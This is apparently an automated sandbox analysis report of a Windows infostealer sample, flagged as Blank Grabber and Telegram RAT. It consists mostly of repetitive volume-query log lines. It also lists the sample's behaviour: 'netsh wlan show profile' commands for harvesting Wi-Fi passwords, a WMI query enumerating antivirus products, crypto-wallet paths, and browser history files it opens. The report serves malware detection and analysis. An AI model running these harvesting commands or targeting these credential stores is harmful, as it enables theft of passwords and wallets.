Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 0_2_00007FF6BA3AD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6BA3AD010

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 0_2_00007FF6BA3C5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF6BA3C5C00

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Code function: 83_2_00007FF6D7F148CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

83_2_00007FF6D7F148CC

Source: C:\Users\user\AppData\Local\Temp\bound.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687939163.00000230D3DC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2241739190.000002506917B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687939163.00000230D3DC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: El9HaBFrFM.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
